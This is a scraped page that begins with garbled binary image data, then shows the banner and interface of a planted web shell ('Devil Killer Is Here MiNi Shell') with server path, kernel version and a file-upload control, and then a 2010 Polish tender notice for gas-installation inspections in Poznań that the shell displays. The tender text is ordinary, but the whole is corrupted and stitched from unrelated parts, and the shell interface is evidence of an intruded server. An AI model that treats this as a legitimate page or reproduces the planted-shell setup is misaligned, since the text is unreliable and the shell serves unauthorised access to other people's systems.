JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100407/77339-N-2010.html

<p class="kh_header"><b>Poznań: Kontrole instalacji gazowych</b><br>
<b>Numer ogłoszenia: 77339 - 2010; data zamieszczenia: 07.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Poznań - Zarząd Komunalnych Zasobów Lokalowych w im. i na rzecz którego działa Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. , ul. Rybaki 18a, 61-884 Poznań, woj. wielkopolskie, tel. (061) 657 90 00, faks (061) 657 90 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgm.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna działająca w imieniu administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrole instalacji gazowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są usługi okresowej kontroli instalacji gazowej, zgodnie z zakresem, o którym mowa w art.62 ust.1 pkt 1 lit. c oraz  w art.62 ust. 1 pkt 3 ustawy z dnia 7 lipca 1994r - Prawo budowlane ( tj. Dz. U. z 2006r. Nr 156, poz. 1118 ze zmianami ), w budynkach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółkę Akcyjną, z siedzibą  przy ul. Rybaki 18a, w Poznaniu. Zamówienie zostało podzielone na osiem części: część I - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 1 (liczba lokali mieszkalnych - 801, liczba lokali użytkowych - 35);część II -usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 2 (liczba lokali mieszkalnych - 1743, liczba lokali użytkowych - 66);część III - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 3 (liczba lokali mieszkalnych - 697, liczba lokali użytkowych - 118);część IV - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 4 (liczba lokali mieszkalnych - 556, liczba lokali użytkowych - 24);część V - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 5 (liczba lokali mieszkalnych - 521, liczba lokali użytkowych - 36);
część VI - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 6 (liczba lokali mieszkalnych - 111, liczba lokali użytkowych - 4);część VII - usługa okresowej rocznej kontroli gazowej w lokalach administrowanych przez Dział Eksploatacji (liczba lokali użytkowych - 127);
część VIII - usługa okresowej kontroli gazowej, wykonanej co najmniej dwa razy w roku, zgodnie z art. 62 ust.1 pkt 3 ustawy z dnia  7 lipca 1994r. - Prawo budowlane w budynkach wielkopowierzchniowych  administrowanych przez MPGM S.A. w Poznaniu (liczba lokali mieszkalnych - 353, liczba lokali użytkowych - 83). 	Przeprowadzenie kontroli instalacji gazowej winno odbyć się zgodnie z wymaganiami i procedurą wykonania okresowej kontroli stanu technicznej sprawności instalacji gazowej w budynkach mieszkalnych, zamieszkania zbiorowego i użyteczności publicznej określonymi w Polskiej Normie PN-M-34507. Kontrola instalacji gazowej obejmuje w szczególności:oględziny, pomiary  szczelności i ewentualnie próby   eksploatacyjne instalacji, wyposażenia i urządzeń gazowych oraz usunięcie drobnych nieszczelności nie wymagających rozkręcania instalacji.W ramach usługi należy m. in.:
a)zbadać całą wewnętrzną instalację gazową w budynku od zaworu głównego poprzez indywidualne gazomierze do armatury i urządzeń odbiorczych w lokalach i pomieszczeniach wspólnego użytku włącznie (kuchenki gazowe, termy, piecyki itp.), skontrolować sprawność działania i szczelność armatury i urządzeń oraz szczelność przewodów w całym obiekcie - pomiarów dokonywać przyrządem pomiarowym, posiadającym świadectwo kalibracji wydane przez akredytowane laboratorium, ważne w dniu badania, ponadto posiadającym certyfikat na znak bezpieczeństwa.Do lokalizowania miejsc wypływu gazu należy stosować wykrywacz gazu (w tym wypadku metanu) o progu czułości 0,1 promila zawartości metanu, a do sprawdzenia obecności paliwa gazowego w pomieszczeniu należy stosować eksplozymetr o zakresie pomiarowym od 0 % do 100 % DGW, lub inny równoważny metanomierz. Do badania złącza izolującego dopuszcza się stosowanie zwykłych mierników wielkości elektrycznych; b)obowiązkowo sprawdzeniem należy objąć szczelność przejścia instalacji przez przegrody zewnętrzne budynku (ściany fundamentowe), kontrola obejmuje wszystkie przewody w pomieszczeniach: kurek główny, pralnie lokatorskie, instalacje w piwnicach wraz z przejściem przewodu przez ścianę zewnętrzną budynku, piony gazowe w lokalach, gazomierze i aparaty gazowe-należy sprawdzić ich szczelność, stan powłok ochronnych, stan zamocowania przewodów i przejść przez przegrody budowlane, sposób prowadzenia przewodów w stosunku do przewodów innych instalacji, stan aparatów gazowych, określić czy nie wprowadzono samowolnych zmian w instalacji w odniesieniu do sposobu użytkowania pomieszczeń;
c)sprawdzić gazomierze wraz z kurkami przed gazomierzami, ich usytuowanie w stosunku do odbiorników energetycznych; d)sprawdzić stan elastycznych podłączeń przyborów gazowych pod kątem zgodności z wymaganymi atestami; e)sprawdzić stan malowania instalacji budynku; f)sprawdzić przebieg przewodów instalacji gazowej w obiektach,lokalach; g)sprawdzić prawidłowość działania odbiorników gazu;
h)skontrolować, czy jest wentylacja grawitacyjna we wszystkich pomieszczeniach;
i)określić, czy pomieszczenia, w których umieszczone są odbiorniki gazu mają odpowiednią kubaturę; j)sprawdzić szczelność instalacji, przebieg pionów gazowych, obecność paliwa gazowego; k)usunąć nieszczelności nie wymagające rozkręcenia instalacji; l)	w przypadku zagrożenia zdrowia lub życia ludzi, bezpieczeństwa mienia lub środowiska naturalnego, a w szczególności zagrożenia katastrofą budowlaną, należy bezzwłocznie zamknąć dopływ gazu do niesprawnej instalacji oraz założyć plombę na kurku odcinającym; m)sporządzić protokoły i wystawić opinie dla każdego lokalu (zgodnie ze wzorem protokołu kontroli - załącznik nr 8 niniejszej SIWZ) i doręczyć za potwierdzeniem odbioru do siedziby właściwej Jednostki we wskazanym w umowie terminie; n)w przypadku lokali w budynkach wielkopowierzchniowych, (część VIII zamówienia) po przeprowadzonej kontroli instalacji gazowej w zakresie opisanym powyżej, osoba dokonująca kontroli jest obowiązana bezzwłocznie, pisemnie zawiadomić właściwy organ nadzoru budowlanego o przeprowadzonej kontroli (zgodnie z art. 62 ust.1 pkt 3 ustawy Prawo budowlane).
Do zadań w zakresie wykonywanych usług należy ponadto:a)złożenie w siedzibie określonej Jednostki harmonogramu prac, nie później niż na 5 dni przed rozpoczęciem prac; b)powiadomienie najemców lokali mieszkalnych i użytkowych o terminie udostępnienia lokali w celu przeprowadzenia okresowej kontroli, poprzez wywieszenie w miejscu publicznie dostępnym np. przy wejściu na klatkę schodową lub tablicy administracyjnej, odpowiedniego zawiadomienia, wraz z nazwiskiem i telefonem kontaktowym osoby uprawnionej do przeprowadzenia kontroli. Zawiadomienie należy wywiesić z wyprzedzeniem co najmniej 14-dniowym; Wykonawca zobowiązany jest wykonać fotografię, umieszczonego w ten sposób zawiadomienia; c)w przypadku nieobecności najemców lokali mieszkalnych i użytkowych w pierwszym terminie przeprowadzanej kontroli, należy wyznaczyć kolejny termin udostępnienia lokalu w celu przeprowadzenia okresowej kontroli, poprzez wywieszenie w miejscu publicznie dostępnym np. przy wejściu na klatkę schodową lub tablicy administracyjnej, odpowiedniego zawiadomienia, wraz z nazwiskiem i telefonem kontaktowym osoby uprawnionej do przeprowadzenia kontroli, a także poprzez pisemne powiadomienie najemców lokali mieszkalnych i użytkowych, w których nie wykonano kontroli w pierwszym terminie. Pisemne zawiadomienie należy doręczyć lokatorom za potwierdzeniem odbioru, a w przypadku ich nieobecności pozostawić w drzwiach lokalu. Zawiadomienie należy wywiesić i doręczyć najemcom z wyprzedzeniem co najmniej 7-dniowym; Wykonawca zobowiązany jest wykonać fotografię, zawiadomienia umieszczonego w miejscu publicznie dostępnym; d)	w przypadku nieobecności najemców lokali mieszkalnych i użytkowych w drugim terminie przeprowadzanej kontroli, Wykonawca zobowiązany będzie wyznaczyć trzeci termin w sposób określony w pkt c); e)w przypadku nieobecności najemców lokali mieszkalnych i użytkowych w trzecim terminie przeprowadzanej kontroli, Wykonawca zobowiązany będzie zawiadomić o tym fakcie właściwą Jednostkę Zamawiającego, przesyłając listę niezbadanych lokali, w terminie 7 dni od dnia podjęcia ostatniej próby; Wykonawca zobowiązany będzie ponadto do sporządzenia stosownego protokołu na okoliczność braku dostępu do lokalu; f)wszystkie dowody takie jak: zdjęcia zawiadomień umieszczonych w miejscach publicznie dostępnych, potwierdzenia odbioru zawiadomienia przez najemców, notatki służbowe, świadczące o skutecznym zawiadomieniu najemców o terminie przeprowadzenia kontroli należy dołączyć do dokumentów dotyczących przeprowadzonej kontroli; g)Zamawiający nie udostępnia aparatów niezbędnych do sporządzenia dokumentacji fotograficznej;
h)przeprowadzenie przeglądu według zakresu określonego w załączniku nr 8 i dostarczenie do właściwej Jednostki opinii po przeglądzie; i)dostarczenie do Jednostek protokołów po przeprowadzonym przeglądzie opatrzonych czytelnym podpisem najemcy (wg wzoru - załącznik nr 8); j)dostarczenie zawiadomień złożonych w organie Nadzoru Budowlanego wraz z potwierdzeniem ich doręczenia (dotyczy lokali w budynkach wymienionych w art.62 ust.1 pkt 3 ustawy Prawo budowlane- część VIII  zamówienia, o którym mowa w pkt 3.1); k)przed wykonaniem zamówienia przekazanie Zamawiającemu (kierownikom właściwych Jednostek) danych dotyczących typu stosowanego urządzenia wykrywającego niekontrolowany wypływ gazu, wraz z datą jego ostatniej kontroli metrologicznej oraz przekazanie Zamawiającemu wzorów wykorzystywanych plomb; l)w przypadku zagrożenia zdrowia i życia użytkowników lokali oraz konieczności natychmiastowej interwencji, należy natychmiast zabezpieczyć instalację gazową, zawiadomić właściwe służby (np. pogotowie gazowe) i niezwłocznie powiadomić Zarządcę (właściwą Jednostkę);
m)w przypadku stwierdzenia, w trakcie prowadzonej kontroli, wykonania przez lokatorów przeróbek instalacji i urządzeń gazowych, Wykonawca zobowiązany będzie do sporządzenia dokumentacji fotograficznej stwierdzonej nieprawidłowości. Dokumentację tą należy dołączyć do protokołu pokontrolnego.
Wykonawca zobowiązany jest wykonać przedmiot zamówienia przy wykorzystaniu co najmniej dwuosobowych brygad, przy czym na jedną brygadę nie może przypadać więcej niż 450 lokali. Czynności kontrolne należy wykonać rzetelnie i wyłącznie przez osoby posiadające wymagane przepisami uprawnienia energetyczne typu D dla urządzeń, instalacji i sieci gazowych w zakresie niezbędnym do prawidłowego wykonania przedmiotu zamówienia. Zamawiający wymaga aby w jednej dwuosobowej brygadzie, była co najmniej jedna osoba z ww uprawnieniami. Osoby, dokonujące kontroli, potwierdzają przeprowadzenie kontroli instalacji gazowej  poprzez złożenie podpisu na protokole kontroli, stanowiącym załącznik nr 8 SIWZ.
Szczegółowy wykaz adresów nieruchomości dotyczących części I-VII zawiera załącznik nr 1 do umowy , który został przedstawiony  w Części II SIWZ.
Szczegółowy wykaz adresów nieruchomości dotyczących części VIII zawiera załącznik nr 1 do umowy , który został przedstawiony  w Części II SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na usługę okresowej kontroli instalacji gazowej, zgodnie z zakresem, o którym mowa w art.62 ust.1 pkt 1 lit. c oraz w art. 62 ust.1 pkt 3 ustawy Prawo budowlane, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest wykazać, że wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych-wykonuje) w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, minimum jedną pracę podobną do objętej przedmiotem zamówienia. Za jedną pracę podobną zamawiający uzna realizację pracy polegającej na wykonywaniu przeglądów gazowych lokali w ilości minimum 500 szt. rocznie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający wymaga aby Wykonawca wykazał, że dysponuje lub będzie dysponować wymaganym sprzętem niezbędnym do badania kontroli szczelności instalacji gazowej, posiadającym aktualne zaświadczenie o kalibracji (w przypadku urządzenia badającego stężenie gazu) lub posiadającym aktualne świadectwo sprawności technicznej (w przypadku urządzenia wykrywającego obecność gazu bez pomiaru jego stężenia) dla każdej z dwuosobowych brygad dokonującej kontroli. Zgodnie z Polską Normą PN-M-34507 przyrządy pomiarowe stosowane do wykonywania kontroli okresowej instalacji gazowej powinny mieć certyfikat na znak bezpieczeństwa B i być oznaczone tym znakiem oraz powinny być wzorcowane w okresach zalecanych przez producenta. Do zlokalizowania miejsc wypływu paliwa gazowego z nieszczelności instalacji gazowej należy stosować wykrywacz gazu o progu czułości 0,1 promila zawartości metanu, a do sprawdzenia obecności paliwa gazowego w pomieszczeniu należy stosować eksplozymetr o zakresie pomiarowym od 0% do 100% DGW (dolna granica wybuchowości), lub inny równoważny metanomierz. Do badania złącza izolującego dopuszcza się stosowanie zwykłych mierników wielkości elektrycznych. Do pomiaru strumienia objętości paliwa gazowego wypływającego z nieszczelnej instalacji gazowej należy stosować przyrządy pomiarowe wyszczególnione w PrPN-M-34506; 2.Zamawiający wymaga aby Wykonawca wykazał, że dysponuje lub będzie dysponować wymaganym sprzętem niezbędnym do zakładania plomb na zakręconym kurku odcinającym dopływ gazu w przypadku wykrycia nieprawidłowości badanej instalacji gazowej, zagrażającej bezpieczeństwu mieszkańców i osób trzecich; dla każdej dwuosobowej brygady dokonującej kontroli musi przypadać jedna plombownica. 3.Zamawiający wymaga aby Wykonawca wykazał, że dysponuje lub będzie dysponować wymaganym sprzętem służącym do sporządzania dokumentacji fotograficznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał, że dysponuje lub będzie dysponować co najmniej jedną osobą z uprawnieniami energetycznymi typu D dla  urządzeń, instalacji i sieci gazowych w zakresie niezbędnym do prawidłowego wykonania przedmiotu zamówienia dla każdej, dwuosobowej brygady dokonującej kontroli. Przy czym na jedną dwuosobową brygadę, realizującą przedmiot zamówienia nie może przypadać więcej niż 450 lokali.
W przypadku składania oferty na dwie lub więcej części zamówienia należy dysponować odpowiednią ilością dwuosobowych brygad, przyjmując, że na każde rozpoczęte 450 badanych lokali należy dysponować kolejną (inną) dwuosobową brygadą, w której jedna osoba posiada w/w wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
1.W przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej Wykonawcy, zmiana firmy, pod którą działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w zakresie dokonanych zmian strukturalnych;
 2.W przypadku udzielenia zamówienia podwykonawcom w innej części niż wskazana w ofercie Wykonawcy, w zakresie możliwości przekazania innej części zamówienia podwykonawcom, niż wskazano w umowie; 3.W przypadku zamiany osób wskazanych w umowie jako reprezentantów stron przy realizacji zamówienia; 4.Możliwość dokonania każdej ze zmian np. w zakresie przedmiotu umowy, terminu wykonania przedmiotu umowy, w przypadku gdy z uwagi na liczne przeszkody spowodowane na skutek siły wyższej wykonanie umowy stało się niemożliwe. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu umowy, którego nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich należytych środków, niezależne od stron umowy. Zdarzeniami siły wyższej są takie zdarzenia jak: klęski żywiołowe, anomalie klimatyczne, wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne podobne decyzje władz państwowych; 5.Możliwość dokonania zmian na skutek zdarzenia niezależnego od Zamawiającego np. decyzji organu administracji orzeczenia sądowego, bezpośrednio wpływającego na przedmiot zamówienia, w zakresie objętym decyzją lub orzeczeniem sądu; 6.Możliwość zmiany terminu wykonania zamówienia, gdy zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, np.: toczące się nowe postępowanie na świadczenie usług objętych umową;
